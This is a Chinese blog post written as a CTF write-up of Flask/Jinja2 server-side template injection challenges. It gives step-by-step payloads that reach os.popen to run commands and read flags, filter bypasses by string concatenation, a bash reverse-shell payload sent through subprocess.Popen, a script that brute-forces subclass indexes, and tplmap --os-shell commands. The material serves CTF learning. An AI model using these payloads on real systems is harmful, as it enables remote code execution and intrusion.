SSTI Flask做题记录1

最新推荐文章于 2024-06-03 17:07:42 发布
最新推荐文章于 2024-06-03 17:07:42 发布
阅读量997 收藏 5
点赞数 3
分类专栏: SSTI Flask 文章标签: SSTI Flask
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46091464/article/details/109030194
版权

这个知识点是前几天从接触的,是因为创建HDCTF的比赛遇到的于是自己就来记录一下和学习一下

1. ezflask

hdctfezflask地址

这个题比较简单,直接一层一层的去找一找利用的类和函数就可以啦
记录一下自己的步骤:

1.{{''.__class__}}   # 获得单引号的类型
2.{{''.__class__.__base__}} #获得object
3.{{''.__class__.__base__.__subclasses__()}}#获得基类
4.{{''.__class__.__base__.__subclasses__()[132]}}#这里我们利用的是<class 'os._wrap_close'>类
5.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__}}#将该类实例化并且全局搜索查找所有的方法、变量和参数
6.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls').read()}}#利用popen函数执行命令
7.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat flag').read()}}#最后获得flag

2. ezflask 2

hdctfezflask2地址
该题在ezflask的基础上做了一些过滤,前面寻找类和函数的方法还是一样

1.{{''.__class__}}   # 获得单引号的类型
2.{{''.__class__.__base__}} #获得object
3.{{''.__class__.__base__.__subclasses__()}}#获得基类
4.{{''.__class__.__base__.__subclasses__()[132]}}#这里我们利用的是<class 'os._wrap_close'>类
5.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__}}#将该类实例化并且全局搜索查找所有的方法、变量和参数
6.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['po''pen']('ls').read()}}#利用popen函数执行命令,通过字符串拼接绕过。因为dict类型可以使用字符串拼接
7.{{''.__class__.__base__.__subclasses__()[132].__init__.__globals__['pop''en']('cat fla''g').read()}}#最后获得flag

该题主要是通过字符串拼接绕过
原理是dict类型可以使用字符串拼接

3.fake google

地址buu平台
做法还是一样,只是利用的类位置不同,下面我会分享自己获得需要类位置的方法

1.{{''.__class__}}   # 获得单引号的类型
2.{{''.__class__.__base__}} #获得object
3.{{''.__class__.__base__.__subclasses__()}}#获得基类
4.{{''.__class__.__base__.__subclasses__()[117]}}#这里我们利用的是os._wrap_close类
5.{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__}}#将该类实例化并且全局搜索查找所有的方法、变量和参数
6.{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__['po''pen']('ls').read()}}#利用popen函数执行命令,通过字符串拼接绕过。因为dict类型可以使用字符串拼接
7.{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__['popen']('cat /flag').read()}}#最后获得flag

也可以利用其它模块进行反弹shell

#利用该模块<class 'subprocess.Popen'>,位置是402
1.{{''.__class__.__base__.__subclasses__()[402]}}#获得该类
2.{{''.__class__.__base__.__subclasses__()[402]("bash -c "bash-i >&/dev/tcp/vps/端口 0>&1"",shell=True)}}#在自己的服务器上面nc -lvp 81开一个监听端口反弹shell

但是这里返回500,其它的题可以尝试

4. 如何获得我们想要subclasses下面的基类

方法一:利用脚本去跑或者bp跑一样的

#-*- coding:utf-8 -*-
#Firebasky
import requests as req
import time

url = "url?name="

for i in range(1,1000):
    time.sleep(0.08)
    payload = '{{"".__class__.__mro__[1].__subclasses__()['+str(i)+']}}'            
    print(payload)
    r = req.get(url+payload)
        
    if "os._wrap_close" in r.text:
        print(i)
        break
#{{"".__class__.__mro__[1].__subclasses__()[xxx]}}

方法二:复制下来利用python的for循环打印,然后放在notepad里面就可以看到每一行

5. 利用工具tplmap进行

安装:git clone https://github.com/epinna/tplmap
这里利用ezflask来演示
进入tplmap工具的目录.输入:python tplmap.py -u http://8.129.15.153:20022/?name=
然后就进入检测
在这里插入图片描述拿shell:python tplmap.py -u http://8.129.15.153:20022/?name= --engine jinja2 --os-shell
在这里插入图片描述
在这里插入图片描述
success

上面的思路比较简单,后面会陆陆续续的分享其它的方法和思路

参考:flask之ssti模版注入从零到入门

Firebasky
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ssti--flask模块
m0_67467924的博客
05-29 282
构造payload:''.__class__.__mro__[2].__subclasses__()[71].__init__.__globals__['os'].popen('ls').read()模板的作用是使用静态的页面html展示动态的内容。模板其实是一个响应文本的文件,其中变量表示动态部分,告诉模板引擎具体的值需要从使用的数据中获取,使用真实值替换变量,得到字符串的过程被称为渲染。可以使用如下模块控制语句查找,子类的初始化方法中的全局变量里是否存在os,如果有os,就返回当前模板中列表的下标。
Flask SSTI/沙箱逃逸的一些总结
01-20
0x00 SSTI原理 ​ 模板注入,与SQL注入、命令注入等原理相似,都是用户的输入数据没有被合理的处理控制时,就有可能数据插入了程序段中成为程序的一部分,从而改变了程序的执行逻辑。 0x01 沙箱逃逸原理 沙盒/沙箱 ...
SSTI-flask
unexpectedthing的博客
11-27 503
文章目录前言flask基础SSTI简介魔术方法命令执行文件读取通用命令执行过滤bypass参考文献 前言 从极客大挑战中一道题,虽然挺简单的,但是自己发现在模板注入中有很多不懂的东西。 flask基础 先理解flask的流程明白 from flask import flask @app.route('/index/') def hello_word(): return 'hello word' 其中@app.route(’/index/’),是将函数跟url绑定起来,当你访问http://xxx
SSTI注入WAF绕过篇
最新发布
zkaq7777777的博客
06-03 695
SSTI,其中文名为服务端模板注入。首先我们需要先了解一下:什么是模板引擎?模板引擎是为了使用户界面与业务数据分离而产生,它可以生成特定格式的文档,利用模板引擎来生成前端的 HTML 代码,模板引擎会提供一套生成 HTML 代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模板 + 用户数据的前端 HTML 页面,然后反馈给浏览器,呈现在用户面前。
ssti-flask-labs
qing_chuan_的博客
07-25 547
第一关轻松过,没waf,找了半天的os模块在哪,一直以为是132,结果在133.。。。。。
SSTI学习(Flask)
yaoge1225的博客
07-19 170
SSTI学习(Flask) 本地环境docker vulhub from flask import Flask, request from jinja2 import Template app = Flask(__name__) @app.route("/") def index(): name = request.args.get('name', 'guest') t = Template("Hello " + name) return t.render() if __na
CTF题型 SSTI(1) Flask-SSTI-labs 通关 题记
qq_39947980的博客
03-13 1850
CTF题型 SSTI(1)基础必过 学会自己手动构造payload
fenjing工具,ssti
12-17
标题中的“fenjing工具,ssti”指的是Fenjing,一个可能用于安全测试或Web应用漏洞扫描的工具,而“ssti”则是Server-Side Template Injection(服务器端模板注入)的缩写,这是一种常见的Web应用程序安全漏洞。...
SSTI
03-09
4. **使用安全的模板引擎**:选择具有良好安全记录和防注入机制的模板引擎,如Jinja2的安全模式。 5. **更新与修补**:保持软件更新,及时修复已知的安全漏洞。 6. **日志监控**:监测异常请求和模板执行行为,尽早...
ssti-payload:SSTI有效载荷生成器
02-06
SSTI有效载荷发生器 该生成器是针对特定类型的Java SSTI的,其受以下启发: ${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(99)....
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过 .pdf
09-05
SSTI漏洞学习(下)——Flask_Jinja模板引擎的相关绕过》 SSTI,即Server-Side Template Injection,是针对服务器端模板引擎的一种安全漏洞,允许攻击者通过注入恶意代码来控制模板渲染过程,从而获取敏感信息或...
SSTI模板注入(flask) 学习总结
Jay17的博客
10-18 1078
SSTI模板注入(flask) 学习总结
ssti详解与例题以及绕过payload大全
HoAd'blog
02-10 9310
ssti详解与例题以及绕过payload大全 [BJDCTF2020]Cookie is so stable user=1231{{2*4}} 判断是不是ssti user={{system('ls')}} 执行命令,但不能成功,,好像是空格不可以 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}} 这是最后的payload https://0day.work/jinja2
Flask SSTI漏洞介绍及利用
JCPS_Y的博客
10-23 2643
Flask SSTI漏洞介绍及利用
SSTI详解 一文了解SSTI和所有常见payload 以flask模板为例
闵行小鱼塘
10-13 5473
做的ctf题里有好几道跟SSTI有关,故对SSTI进行学习,在此做个小结与记录
SSTIflask 模板注入最详解
weixin_53146913的博客
05-10 2035
一、flask是用python编写的一个轻量web开发框架。 二、flask使用jinjia2渲染引擎进行网页渲染,当处理不得当,未进行语句过滤,用户输入{{控制语句}},会导致渲染出恶意代码,形成注入。 三、flask基础知识: 1. __class__: 返回当前类(有字符串类,元组类,字典组等等) 所有的子类都有一个共同的父类object,如果没指定继承,默认父类是object 2. __mor__: 返回解析函数时,类的调用顺序,先调用str类,再调用object类,通过索引的方式__
[Flask]SSTI
1ance's blog
11-18 1450
文章目录环境解题思路参考 环境 BUUCTF上的在线环境,启动靶机,获取链接: http://node4.buuoj.cn:27904 解题思路 访问后显示页面。 根据题目提示是考SSTI,所以我们传个name参数看看。 http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。 我们在构造{{2*3}}看看,是否存在SSTI。 成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。 这里我在网上找的: {% for c in
flask sssti lab闯关记录
weixin_44576725的博客
04-14 2667
flask ssti lab闯关记录 sstilab是一个模板注入的靶场,目前只有Flask模板注入的练习 地址:https://github.com/X3NNY/sstilabs level 1 判断出是post方法 借用bp的intrude模块查看可以利用的类,这里查找的模块是__import__ 发现80、81、82、83可以有__import__模块,加以利用得到payload {{[].__class__.__base__.__subclasses__()[80].__init__.__gl
flask ssti
09-26
Flask SSTI(Server-Side Template Injection)是指在Flask应用中,由于未正确处理用户输入,导致用户输入的模板言被当作代码执行的漏洞。攻击者可以通过向模板注入恶意代码来执行任意命令或获取敏感信息。要防止...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值